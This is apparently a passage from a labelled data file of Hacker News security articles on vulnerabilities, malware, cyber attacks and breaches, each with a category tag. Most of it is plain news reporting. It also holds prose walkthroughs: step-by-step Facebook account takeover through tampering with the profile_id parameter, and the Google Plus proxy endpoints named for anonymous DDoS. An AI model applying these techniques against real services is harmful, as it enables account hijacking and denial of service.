Two critical vulnerabilities (CVE-2016-10275 and CVE-2016-10276) in Qualcomm bootloader create conditions ripe for an elevation of privilege attacks, enabling ""a local malicious application to execute arbitrary code within the context of the kernel,"" according to the bulletin.
Another critical Qualcomm bug (CVE-2017-0604) in power driver could also allow a local malicious application to execute malicious code on the device within the context of the kernel, which is the most privileged area of the OS.
No Evidence of Flaws Being Exploited in the Wild
Six of the 17 critical patches are addressed with the 2017-05-01 partial security patches, while the remaining 11 critical security flaws affecting various drivers, libraries and bootloaders are patched in the 2017-05-05 complete patch level.
Good news is that Google assured its users that there are no reports of any of the security vulnerabilities being exploited in the wild.
Google says, having two patch levels ""provide Android partners with the flexibility to more quickly fix a subset of vulnerabilities that are similar across all Android devices.""
So, users are strongly advised to download the most recent Android security update to keep their devices protected against any potential attack.
Nexus and Pixel devices will receive the complete patch in an over-the-air update in the coming days, or the owners can download it directly from Google's developer site.
It's also worth noting that Google revealed last week that the Nexus 6 and Nexus 9, which were released in November 2014, would no longer be ""guaranteed"" to receive security updates after October 2017.
A similar timeline has been offered for newer Pixel and Pixel XL handsets of October 2019. After that, the tech giant will only push necessary security fixes to those devices.
",Vulnerability
Stuxnet-like 'Havex' Malware Strikes European SCADA Systems,https://thehackernews.com/2014/06/stuxnet-like-havex-malware-strikes.html,"Security researchers have uncovered a new Stuxnet like malware, named as ""Havex"", which was used in a number of previous cyber attacks against organizations in the energy sector.
Just like Famous Stuxnet Worm, which was specially designed to sabotage the Iranian nuclear project, the new trojan Havex is also programmed to infect industrial control system softwares of SCADA and ICS systems, with the capability to possibly disable hydroelectric dams, overload nuclear power plants, and even can shut down a country's power grid with a single keystroke.
According to security firm F-Secure who first discovered it as Backdoor:W32/Havex.A., it is a generic remote access Trojan (RAT) and has recently been used to carry out industrial espionage against a number of companies in Europe that use or develop industrial applications and machines.
SMARTY PANTS, TROJANIZED INSTALLERS
To accomplish this, besides traditional infection methods such as exploit kits and spam emails, cybercriminals also used an another effective method to spread Havex RAT, i.e. hacking the websites of software companies and waiting for the targets to install trojanized versions of legitimate apps.
During installation, the trojanized software setup drops a file called ""mbcheck.dll"", which is actually Havex malware, that attackers are using as a backdoor. ""The C&C server will [then] instruct infected computers to download and execute further components,""
""We gathered and analyzed 88 variants of the Havex RAT used to gain access to, and harvest data from, networks and machines of interest. This analysis included investigation of 146 command and control (C&C) servers contacted by the variants, which in turn involved tracing around 1500 IP addresses in an attempt to identify victims."" F-Secure said.
F-secure didn't mention the names of the affected vendors, but an industrial machine producer and two educational organizations in France, with companies in Germany were targeted.
INFORMATION GATHERING
Havex RAT is equipped with a new component, whose purpose is to gather network and connected devices information by leveraging the OPC (Open Platform Communications) standard.
OPC is a communications standard that allows interaction between Windows-based SCADA applications and process control hardware. The malware scans the local network for the devices that respond to OPC requests to gather information about industrial control devices and then sends that information back to its command-and-control (C&C) server.
Other than this, it also include information-harvesting tools that gather data from the infected systems, such as:
Operating system related information
A Credential-harvesting tool that stole passwords stored on open web browsers
A component that communicates to different Command-&-Control servers using custom protocols and execute tertiary payloads in memory.
""So far, we have not seen any payloads that attempt to control the connected hardware."" F-secure confirmed.
MOTIVATION?
While their motivation is unclear at this point, ""We also identified an additional component used by the attackers that includes code to harvest data from infected machines used in ICS/SCADA systems. This indicates that the attackers are not just interested in compromising the networks of companies they are interested in, but are also motivated in having control of the ICS/SCADA systems in those organizations."" F-Secure noticed.
HAVEX TROJAN FROM RUSSIANS ?
In January this year, Cybersecurity firm CrowdStrike revealed about a cyber espionage campaign, dubbed ""Energetic Bear,"" where hackers possibly tied to Russian Federation penetrating the computer networks of energy companies in Europe, the United States and Asia.
According to CrowdStrike, the Malwares used in those cyber attacks were HAVEX RAT and SYSMain RAT, and possibly HAVEX RAT is itself a newer version of the SYSMain RAT, and both tools have been operated by the attackers since at least 2011.
That means, It is possible that Havex RAT could be somehow linked to Russian hackers or state-sponsored by Russian Government.
",Malware
DDoS Attack Using Google Plus Servers,https://thehackernews.com/2011/08/ddos-attack-using-google-plus-servers.html,"A Security expert at Italian security firm AIR Sicurezza Informatica has claimed that Google's servers vulnerability allows a hacker to exploit the search giant's bandwidth to launch a distributed denial-of-service (DDoS) attack on any targeted server.
On the IHTeam Security Blog, Simone Quatrini, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf.
Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own, in an effort to prevent it from functioning.
The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method) and the funny thing is that apache will log Google IP addresses.
But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you'll need to use /_/sharebox/linkpreview/.
WORKING
Using vulnerable pages i.e. ""/_/sharebox/linkpreview/"" and ""gadgets/proxy?"", it is possible to request any file type from the external source, and Google Plus servers will download it to show the content. So, if you parallelize so many requests at same time, it will be possible to perform a significant DDoS attack against any website with Google's bandwidth.
",Vulnerability
Critical SQLite Flaw Leaves Millions of Apps Vulnerable to Hackers,https://thehackernews.com/2018/12/sqlite-vulnerability.html,"Cybersecurity researchers have discovered a critical vulnerability in widely used SQLite database software that exposes billions of deployments to hackers.
Dubbed as 'Magellan' by Tencent's Blade security team, the newly discovered SQLite flaw could allow remote attackers to execute arbitrary or malicious code on affected devices, leak program memory or crash applications.
SQLite is a lightweight, widely used disk-based relational database management system that requires minimal support from operating systems or external libraries, and hence compatible with almost every device, platform, and programming language.
SQLite is the most widely deployed database engine in the world today, which is being used by millions of applications with literally billions of deployments, including IoT devices, macOS and Windows apps, including major web browsers, such as Adobe software, Skype and more.
Since Chromium-based web browsers—including Google Chrome, Opera, Vivaldi, and Brave—also support SQLite through the deprecated Web SQL database API, a remote attacker can easily target users of affected browsers just by convincing them into visiting a specially crafted web-page.
""After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability,"" the researchers said in a blog post.
SQLite has released updated version 3.26.0 of its software to address the issue after receiving responsible disclosure from the researchers.
Google has also released Chromium version 71.0.3578.80 to patch the issue and pushed the patched version to the latest version of Google Chrome and Brave web-browsers.
Tencent researchers said they successfully build a proof-of-concept exploit using the Magellan vulnerability and successfully tested their exploit against Google Home.
Since most applications can't be patched anytime sooner, researchers have decided not to disclose technical details and proof-of-concept exploit code to the public.
""We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible,"" the researchers said.
Since SQLite is used by everybody including Adobe, Apple, Dropbox, Firefox, Android, Chrome, Microsoft and a bunch of other software, the Magellan vulnerability is a noteworthy issue, even if it's not yet been exploited in the wild.
Users and administrators are highly recommended to update their systems and affected software versions to the latest release as soon as they become available.
Stay tuned for more information.
",Vulnerability
"First widely distributed Android bootkit Malware infects more than 350,000 Devices",https://thehackernews.com/2014/01/first-widely-distributed-android.html,"In the last quarter of 2013, sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user.
A Russian security firm 'Doctor Web' identified the first mass distributed Android bootkit malware called 'Android.Oldboot', a piece of malware that's designed to re-infect devices after reboot, even if you delete all working components of it.
The bootkit Android.Oldboot has infected more than 350,000 android users in China, Spain, Italy, Germany, Russia, Brazil, the USA and some Southeast Asian countries. China seems to a mass victim of this kind of malware having a 92 % share.
A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data, remove the application, open connection for Command and controller.
A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init' script (initialize the operating system) to re-load the malware as you switch on your android.
When you start your device, this script loads the Trojan 'imei_chk' (detects it as Android.Oldboot.1) which extract two files libgooglekernel.so (Android.Oldboot.2) and GoogleKernel.apk (Android.Oldboot.1.origin), copy them respectively in /system/lib and /system/app.
Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download, remove installed apps, and install malicious apps.
Since it becomes a part of the boot partition, formatting the device will not solve the problem. The researchers believe that the devices somehow had the malware pre-loaded at the time of shipping from the manufacturer, or was likely distributed inside modified Android firmware. So, users should beware of certain modified Android firmware.
Two weeks ago, Some Chinese Security Researchers have also detected a bootkit called 'Oldboot', possibly the same malware or another variant of it.
""Due to the special RAM disk feature of Android devices' boot partition, all current mobile antivirus products in the world can't completely remove this Trojan or effectively repair the system.""
""According to our statistics, as of today, there're more than 500, 000 Android devices infected by this bootkit in China in last six months.
The Android malware Android.Oldboot is almost impossible to remove, not even with formatting your device. But if your device is not from a Chinese manufacturer, then chances that you are a victim of it, are very less.
This bootkit is not the first of this kind. Two years back, in the month of March we reported, NQ Mobile Security Research Center uncovered the world's first Android bootkit malware called 'DKFBootKit', that replaces certain boot processes and can begin running even before the system is completely booted up.
But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully, the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone.
Users are recommended to install apps from authorized stores such as Google Play, disable installation of apps from 'Unknown Sources' and for a better security install a reputed security application.
You can also try to re-flash your device with its original ROM. After flashing, the bootkit will be removed.
",Malware
New Chrome 0-day Under Active Attacks – Update Your Browser Now,https://thehackernews.com/2020/10/chrome-zeroday-attacks.html,"Attention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today.
Google released Chrome version 86.0.4240.111 today to patch several security high-severity issues, including a zero-day vulnerability that has been exploited in the wild by attackers to hijack targeted computers.
Tracked as CVE-2020-15999, the actively exploited vulnerability is a type of memory-corruption flaw called heap buffer overflow in Freetype, a popular open source software development library for rendering fonts that comes packaged with Chrome.
The vulnerability was discovered and reported by security researcher Sergei Glazunov of Google Project Zero on October 19 and is subject to a seven-day public disclosure deadline due to the flaw being under active exploitation.
Glazunov also immediately reported the zero-day vulnerability to FreeType developers, who then developed an emergency patch to address the issue on October 20 with the release of FreeType 2.10.4.
Without revealing technical details of the vulnerability, the technical lead for Google's Project Zero Ben Hawkes warned on Twitter that while the team has only spotted an exploit targeting Chrome users, it's possible that other projects that use FreeType might also be vulnerable and are advised to deploy the fix included in FreeType version 2.10.4.
""While we only saw an exploit for Chrome, other users of freetype should adopt the fix discussed here: https://savannah.nongnu.org/bugs/?59308 -- the fix is also in today's stable release of FreeType 2.10.4,"" Hawkes writes.
According to details shared by Glazunov, the vulnerability exists in the FreeType's function ""Load_SBit_Png,"" which processes PNG images embedded into fonts. It can be exploited by attackers to execute arbitrary code just by using specifically crafted fonts with embedded PNG images.
""The issue is that libpng uses the original 32-bit values, which are saved in `png_struct`. Therefore, if the original width and/or height are greater than 65535, the allocated buffer won't be able to fit the bitmap,"" Glazunov explained.
Glazunov also published a font file with a proof-of-concept exploit.
Google released Chrome 86.0.4240.111 as Chrome's ""stable"" version, which is available to all users, not just to opted-in early adopters, saying that the company is aware of reports that ""an exploit for CVE-2020-15999 exists in the wild,"" but did not reveal further details of the active attacks.
Besides the FreeType zero-day vulnerability, Google also patched four other flaws in the latest Chrome update, three of which are high-risk vulnerabilities—an inappropriate implementation bug in Blink, a use after free bug in Chrome's media, and use after free bug in PDFium—and one medium-risk use after free issue in browser's printing function.
Although the Chrome web browser automatically notifies users about the latest available version, users are recommended to manually trigger the update process by going to ""Help → About Google Chrome"" from the menu.
",Malware
TSMC Chip Maker Blames WannaCry Malware for Production Halt,https://thehackernews.com/2018/08/tsmc-wannacry-ransomware-attack.html,"Taiwan Semiconductor Manufacturing Company (TSMC)—the world's largest makers of semiconductors and processors—was forced to shut down several of its chip-fabrication factories over the weekend after being hit by a computer virus.
Now, it turns out that the computer virus outbreak at Taiwan chipmaker was the result of a variant of WannaCry—a massive ransomware attack that wreaked havoc across the world by shutting down hospitals, telecom providers, and many businesses in May 2017.
TSMC shut down an entire day of production this weekend after several of its factories systems were halted by a computer virus in the middle of the ramp-up for chips to be used by Apple's future lines of iPhones, which could impact revenue by approx $256 million.
According to the semiconductor manufacturer, its computer systems were not direct attacked by any hacker, but instead, were exposed to the malware ""when a supplier installed tainted software without a virus scan"" to TSMC's network.
The virus then quickly spread to more than 10,000 machines in some of the company's most advanced facilities, including Tainan, Hsinchu, and Taichung—home to some of the cutting-edge fabrication plants that produce semiconductors for Apple.
Although unnamed in its official statement, TSMC reportedly blamed a variant of the 2017 WannaCry ransomware attack for the infection.
""We are surprised and shocked,"" TSMC CEO C.C. Wei said, ""We have installed tens of thousands of tools before, and this is the first time this happened.""
Claimed to be developed and spread by North Korea, the WannaCry ransomware shut down hospitals, telecom providers, and many businesses worldwide, infecting hundreds of thousands of computers in over 150 countries within just 72 hours in May 2017.
The WannaCry victims included big names like Boeing, Renault, Honda, FedEx and the UK's National Health Service.
The WannaCry worm was leveraging an NSA's Windows SMB exploit, known as EternalBlue, leaked by the infamous hacking group Shadow Brokers in its April data dump, along with other Windows exploits.
TSMC assured its customers that no confidential information was stolen, and said the company has resumed full operations at its facilities, but shipment delays are expected.
However, the chipmaker declined to discuss the implications for Apple, which is said to be ramping up production of 3 new iPhone models for this fall.
Besides being Apple's sole supplier of SoC components for iPhones and iPads, TSMC also manufactures processors and other silicon chips for many of the industry's biggest tech companies, including AMD, NVIDIA, Qualcomm, and others.
",Malware
LifeLabs Paid Hackers to Recover Stolen Medical Data of 15 Million Canadians,https://thehackernews.com/2019/12/lifelabs-data-breach.html,"LifeLabs, the largest provider of healthcare laboratory testing services in Canada, has suffered a massive data breach that exposed the personal and medical information of nearly 15 million Canadians customers.
The company announced the breach in a press release posted on its website, revealing that an unknown attacker unauthorizedly accessed its computer systems last month and stole customers' information, including their:
Names
Addresses
Email addresses
Login information
Passwords, for their LifeLabs account
Dates of birth
Health card numbers
Lab test results
The Toronto-based company discovered the data breach at the end of October, but the press release does not say anything about the identity of the attacker(s) and how they managed to infiltrate its systems.
However, LifeLabs admitted it paid an undisclosed amount of ransom to the hackers to retrieve the stolen data, which indicates that the attack might have been carried out using a ransomware style malware with data exfiltration abilities.
""Retrieving the data by making a payment. We did this in collaboration with experts familiar with cyber-attacks and negotiations with cybercriminals,"" the company said while announcing several measures it took to protect its customers' information.
LifeLabs also said the majority of affected customers, who used its labs for diagnostic, naturopathic, and genetic tests, reside in British Columbia and Ontario, with relatively few customers in other locations.
""In the case of lab test results, our investigations to date of these systems indicate that there are 85,000 impacted customers from 2016 or earlier located in Ontario; we will be working to notify these customers directly,"" the press release read.
""Our investigation to date indicates any instance of health care information was from 2016 or earlier.""
LifeLabs said it immediately involved ""world-class cybersecurity experts"" to isolate and secure the affected computer systems and determine the scope of the cyber attack.
The company also stated that it had already notified law enforcement, privacy commissioners, and government partners to investigate the breach incident.
While LifeLabs has taken several steps to fix the system issues related to the cyber attack and strengthen its cyber defenses by placing additional safeguards to protect your information, it is also offering one free year of identity theft insurance.
""Any customer who is concerned about this incident can receive one free year of protection that includes dark web monitoring and identity theft insurance,"" LifeLabs said.
Since the exposed data includes users' account login information, affected users are strongly advised to change their passwords on the company's website as well as on any other where they have reused the same password.
",Data_Breaches
"Memcached DDoS Exploit Code and List of 17,000 Vulnerable Servers Released",https://thehackernews.com/2018/03/memcached-ddos-exploit-code.html,"Two separate proofs-of-concept (PoC) exploit code for Memcached amplification attack have been released online that could allow even script-kiddies to launch massive DDoS attacks using UDP reflections easily.
The first DDoS tool is written in C programming language and works with a pre-compiled list of vulnerable Memcached servers.
Bonus—its description already includes a list of nearly 17,000 potential vulnerable Memcached servers left exposed on the Internet.
Whereas, the second Memcached DDoS attack tool is written in Python that uses Shodan search engine API to obtain a fresh list of vulnerable Memcached servers and then sends spoofed source UDP packets to each server.
Last week we saw two record-breaking DDoS attacks—1.35 Tbps hit Github and 1.7 Tbps attack against an unnamed US-based company—which were carried out using a technique called amplification/reflection attack.
For those unaware, Memcached-based amplification/reflection attack amplifies bandwidth of the DDoS attacks by a factor of 51,000 by exploiting thousands of misconfigured Memcached servers left exposed on the Internet.
Memcached is a popular open source distributed memory caching system, which came into news earlier last week when researchers detailed how hackers could abuse it to launch amplification/reflection DDoS attack by sending a forged request to the targeted Memcached server on port 11211 using a spoofed IP address that matches the victim's IP.
A few bytes of the request sent to the vulnerable Memcached server can trigger tens of thousands of times bigger response against the targeted IP address, resulting in a powerful DDoS attack.
For a detailed explanation on how Memcached amplification attack works, you can head on to our previous article.
Since last week when Memcached has been revealed as a new amplification/reflection attack vector, some hacking groups started exploiting unsecured Memcached servers.
But now the situation will get worse with the release of PoC exploit code, allowing anyone to launch massive DDoS attacks, and will not come under control until the last vulnerable Memcached server is patched, or firewalled on port 11211, or completely taken offline.
Moreover, cybercriminals groups have already started weaponizing this new DDoS technique to threaten big websites for extorting money.
Following last week's DDoS attack on GitHub, Akamai reported its customers received extortion messages delivered alongside the typically ""junk-filled"" attack payloads, asking them for 50 XMR (Monero coins), valued at over $15,000.
Reflection/amplification attacks are not new. Attackers have previously used this DDoS attack technique to exploit flaws in DNS, NTP, SNMP, SSDP, Chargen and other protocols in order to maximize the scale of their cyber attacks.
To mitigate the attack and prevent Memcached servers from being abused as reflectors, the best option is to bind Memcached to a local interface only or entirely disable UDP support if not in use.
",Cyber_Attack
Hackers Exploit VPN to Deploy SUPERNOVA malware on SolarWinds Orion,https://thehackernews.com/2021/04/hackers-exploit-vpn-flaw-to-deploy.html,"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed details of a new advanced persistent threat (APT) that's leveraging the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a connection to a Pulse Secure VPN device.
""The threat actor connected to the entity's network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET web shell), and collected credentials,"" the agency said on Thursday.
CISA said it identified the threat actor during an incident response engagement at an unnamed organization and found that the attacker had access to the enterprise's network for nearly a year through the use of the VPN credentials between March 2020 and February 2021.
Interestingly, the adversary is said to have used valid accounts that had multi-factor authentication (MFA) enabled, rather than an exploit for a vulnerability, to connect to the VPN, thus allowing them to masquerade as legitimate teleworking employees of the affected entity.
In December 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The intrusions have since been attributed to a China-linked threat actor called Spiral.
Unlike Sunburst and other pieces of malware that have been connected to the SolarWinds compromise, Supernova is a .NET web shell implemented by modifying an ""app_web_logoimagehandler.ashx.b6031896.dll"" module of the SolarWinds Orion application. The modifications were made possible by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn permitting a remote attacker to execute unauthenticated API commands.
An investigation into the incident is ongoing. In the meantime, CISA is recommending organizations to implement MFA for privileged accounts, enable firewalls to filter unsolicited connection requests, enforce strong password policies, and secure Remote Desktop Protocol (RDP) and other remote access solutions.
",Cyber_Attack
Buffer Overflow vulnerability in VLC media player,https://thehackernews.com/2013/02/buffer-overflow-vulnerability-in-vlc.html,"VideoLAN recently published a security advisory warning of a buffer overflow vulnerability in versions 2.0.5 and earlier of VLC Media Player, which might be exploited to execute arbitrary code. This vulnerability was reported by Debasish Mandal.
The vulnerability is caused due to an error in the ""DemuxPacket()"" function (modules/demux/asf/asf.c) when processing ASF files and can be exploited to cause a buffer overflow via a specially crafted ASF file. To exploit the vulnerability, a user must explicitly open a specially crafted ASF movie.
Successful exploitation may allow execution of arbitrary code, but requires tricking a user into opening a malicious file.
VideoLAN advises users to refrain from opening files from untrusted locations and to disable the VLC browser plug-ins until the issue is patched. A patch will be included in VLC 2.0.6, the next version of the media player, which is only available for testing purposes at the moment.
",Vulnerability
Researchers Leak PoC Exploit for a Critical Windows RCE Vulnerability,https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html,"A proof-of-concept (PoC) exploit related to a remote code execution vulnerability affecting Windows Print Spooler and patched by Microsoft earlier this month was briefly published online before being taken down.
Identified as CVE-2021-1675, the security issue could grant remote attackers full control of vulnerable systems. Print Spooler manages the printing process in Windows, including loading the appropriate printer drivers and scheduling the print job for printing, among others.
Print Spooler flaws are concerning, not least because of the wide attack surface, but also owing to the fact that it runs at the highest privilege level and is capable of dynamically loading third-party binaries.
The Windows maker addressed the vulnerability as part of its Patch Tuesday update on June 8, 2021. But almost two weeks later, Microsoft revised the flaw's impact from an elevation of privilege to remote code execution (RCE) as well as upgraded the severity level from Important to Critical.
""Either the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or remotely (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., tricking a legitimate user into opening a malicious document),"" Microsoft said in its advisory.
Things took a turn when Chinese security firm QiAnXin earlier this week disclosed it was able to find the ""right approaches"" to leverage the flaw, thereby demonstrating a successful exploitation to achieve RCE.
Although the researchers refrained from sharing additional technical specifics, Hong Kong-based cybersecurity company Sangfor published what's an independent deep-dive of the same vulnerability to GitHub, along with a fully working PoC code, where it remained publicly accessible before it was taken offline a few hours later.
Sangfor codenamed the vulnerability ""PrintNightmare.""
""We deleted the PoC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service,"" tweeted Sangfor's Principal Security Researcher Zhiniang Peng. The findings are expected to be presented at the Black Hat USA conference next month.
Windows Print Spooler has long been a source of security vulnerabilities, with Microsoft fixing at least three issues — CVE-2020-1048, CVE-2020-1300, and CVE-2020-1337 — in the past year alone. Notably, a flaw in the service was also abused to gain remote access and propagate the Stuxnet worm in 2010 targeting Iranian nuclear installations.
Update — There are now indications that the fix released by Microsoft for the critical remote code execution vulnerability in the Windows Print spooler service in June does not completely remediate the root cause of the bug, according to the CERT Coordination Center, raising the possibility that it's a zero-day flaw in need of a patch.
""While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675,"" CERT/CC's Will Dormann said in a vulnerability note published Wednesday.
It's worth noting that the successful exploitation of CVE-2021-1675 could open the door to complete system takeover by remote adversaries. We have reached out to Microsoft for comment, and we will update the story when we hear back.
In light of the latest disclosure, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is recommending that administrators ""disable the Windows Print spooler service in Domain Controllers and systems that do not print.""
",Vulnerability
Personal Data of 50 Million Turkish Citizens Leaked Online,https://thehackernews.com/2016/04/personal-data-leaked.html,"Personal details of nearly 50 Million Turkish citizens, including the country's President Recep Tayyip Erdogan, have been compromised and posted online in a massive security breach.
A database, which contains 49,611,709 records, appeared on the website of an Icelandic group on Monday, offering download links to anyone interested.
If confirmed, the data breach would be one of the biggest public breaches of its kind, effectively putting two-thirds of the Nation's population at risk of identity theft and fraud.
However, The Associated Press (AP) reported on Monday that it was able to partially verify the authenticity of 8 out of 10 non-public Turkish ID numbers against the names in the data leak.
50 Million Turkish Citizens' Personal Data leaked Online
The leaked database (about 6.6 GB file) contains the following information:
First and last names
National identifier numbers (TC Kimlik No)
Gender
City of birth
Date of birth
Full address
ID registration city and district
User's mother and Father's first names
To prove the authenticity of the data, the group of hackers published the personal details of Turkish President Recep Tayyip Erdogan, along with his predecessor Abdullah Gul, and Prime Minister Ahmet Davutoglu.
The attack seems to be politically motivated, as the hackers wrote the following message on the database's front page, featuring Erdogan's profile:
""Who would have imagined that backwards ideologies, cronyism and rising religious extremism in Turkey would lead to a crumbling and vulnerable technical infrastructure?""
Lessons Posted by Hackers
Besides the leaked database, the hackers also provided some lessons to learn from this leak. Under the heading Lessons for Turkey, the hackers wrote:
'Bit shifting isn't encryption,' referring to the fact that the data was improperly protected.
'Index your database. We had to fix your sloppy DB work.'
'Putting a hardcoded password on the UI hardly does anything for security,' though the hackers didn't specify in what UI.
'Do something about Erdogan! He is destroying your country beyond recognition.'
Under the heading Lessons for the United States, the hackers addressed US citizens, asking them not to elect Republican front-runner Donald Trump since he 'sounds like he knows even less about running a country than Erdogan does.'
Links to Download the Database
The database is available online on a Finland-based server. Though the source of the leaked data is currently unknown, it is likely from a Turkish public administration office that deals with users' personal information.
If the authenticity of all 50 Million records gets verified, the breach will be the biggest leaks after the one that occurred in U.S. government's Office of Personnel Management (OPM) in April 2015 that…
...compromised the personal information of over 22 Million U.S. federal employees, contractors, retirees and others, and exposed Millions of sensitive and classified documents.
",Data_Breaches
Desktop Viruses Coming to Your TV and Connected Home Appliances,https://thehackernews.com/2014/04/Viruses-Malware-hacking-Internet-of-things-TV.html,"Smart Devices are growing at an exponential rate and so are the threats to them.
After your Computers, Servers, Routers, Mobiles and Tablets, now hackers are targeting your Smart TVs, warns Eugene Kaspersky the co-founder and chief executive of Kaspersky Lab.
As the increase in the manufactures of Smart TVs by different companies, it could be estimated that by 2016, over 100 million TVs are expected to be connected to the Internet and in the time it may rise as a profitable fruit for the malware authors and cyber criminals to exploit these devices.
The 48 year-old Eugene Kaspersky, one of the world's top technology security experts, has thrown light on the future of Computer Security and warned that Internet of Things (IoT) such as TVs, Refrigerators, Microwave or dishwashers will necessarily bring undesirable cyber threats to your home environment, because any device connected to the Internet is vulnerable and can be infected.
""The threats will diversify to mobile phones and to the home environment, such as through televisions, which are now connected to the Internet,"" he said in an interview with the Telegraph.
The Internet of Things is said to be the next evolutionary step in our connected world that has been already become a major target for cyber criminals.
We have reported before that how 100,000 Refrigerators and other smart household appliances were compromised by hackers to send out 750,000 malicious spam emails; A Linux worm 'Linux.Darlloz' is hijacking Home Routers, Set-top boxes, Security Cameras, printers to mine Crypto Currencies like Bitcoin.
So, the malicious software that already caused damages to your desktops, laptops and targeted your mobile devices till now, is ready to cause harm to your Smart TVs and other Internet connected smart devices.
Kaspersky said his company's global research and development headquarters in Moscow is receiving around 315,000 suspicious activity reports on daily basis, that has doubled over the past year. The threats might crawl to the new sectors other than mobile phones and computer systems.
""There are millions of attacks a year on Microsoft Windows, thousands on mobile phones, mostly on Android, and dozens on Apple's iOS. But more and more engineers are developing software for Android,"" he said.
But according to him ""technically it is possible to infect millions of devices"" because all devices are vulnerable and it is very much possible to see cyber criminals developing viruses for iOS devices.
The fact that I really like what he says, ""What's the difference been a TV and a computer? A bigger screen and a remote control. It has Android inside and memory chips and Internet connections. That's all."" Well said!
He also warned users that as the Internet of Things (IoTs) increases, users need to have top security packages installed on their devices.
""It's just a question of time. We already have a product for mobile and we have a prototype for TV so we are ready to address this issue when new malware for television is released by criminals.""
In the last few years, this emerging domain for the Internet of Things has been attracting the significant interest, and will continue for the years to come. It would be a $20 Trillion Market over the next several years, but Security and privacy are the key issues for such applications, and still face some enormous challenges.
",Malware
Facebook hacked in Zero-Day Attack,https://thehackernews.com/2013/02/facebook-hacked-in-zero-day-attack.html,"Facebook operator of the largest social network with more than 1 billion members, said on Friday it had been the target of an unidentified hacker group, but that no user information was compromised during the attack.
The attack occurred when a handful of the company's employees visited a developer's compromised website, which led to malware being installed on their laptops.
'Last month, Facebook Security discovered that our systems had been targeted in a sophisticated attack,' read the statement, despite the laptops being 'fully-patched and running up-to-date anti-virus software.'
Reports say Facebook knew about the attacks, which likely exploited a zero-day Java software flaw, well before the announcement.
""We are working continuously and closely with our own internal engineering teams, with security teams at other companies, and with law enforcement authorities to learn everything we can about the attack, and how to prevent similar incidents in the future,"" Facebook said on its website.
Facebook was not alone in this attack, Twitter social network, said earlier this month that it had been hacked, and that approximately 2,50,000 user accounts were potentially compromised, with attackers gaining access to information including user names and email addresses.
",Malware
Backdoored PhpMyAdmin distributed at SourceForge site,https://thehackernews.com/2012/09/backdoored-phpmyadmin-distributed-at.html,"A security issue has been reported in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system. The security issue is caused due to the distribution of a compromised phpMyAdmin source code package containing a backdoor, which can be exploited to e.g. execute arbitrary PHP code.
One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.
SourceForge.Net is the world's largest open source software development website. A very large impact on the domestic users with this incident. The vulnerability has been cataloged as being a critical one.
A screenshot as shown of a system containing a malicious backdoor that was snuck into the open-source phpMyAdmin package.
On official website in issue ""PMASA-2012-5"" developers said ""We currently know only about phpMyAdmin-3.5.2.2-all-languages.zip being affected,"".
It's not the first time a widely used open-source project has been hit by a breach affecting the security of its many downstream users. In June of last year, WordPress required all account holders on WordPress.org to change their passwords following the discovery that hackers contaminated it with malicious software.
",Malware
Hacking Facebook Account with just a text message,https://thehackernews.com/2013/06/Hacking-Facebook-account-hack-tool.html,"Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?
Today we are going to explain you that how a UK based Security Researcher, ""fin1te"" is able to hack any Facebook account within a minute by doing one SMS.
Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username.
According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php
This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.
As attacker, follow these steps to execute hack:
Change value of profile_id to the Victim's profile_id value by tampering the parameters.
Send the letter F to 32665, which is Facebook's SMS shortcode in the UK. You will receive an 8 character verification code back.
Enter that code in the box or as confirmation_code parameter value and Submit the form.
Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile.
In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.
Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password!
Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.
In return, Facebook paying $20,000 to fin1te as Bug Bounty.
",Vulnerability
These Top 7 Brutal Cyber Attacks Prove 'No One is Immune to Hacking' — Part I,https://thehackernews.com/2015/09/top-cyber-attacks-1.html,"If you believe that your organization is not at real risk of cyber attack, then you are absolutely wrong.
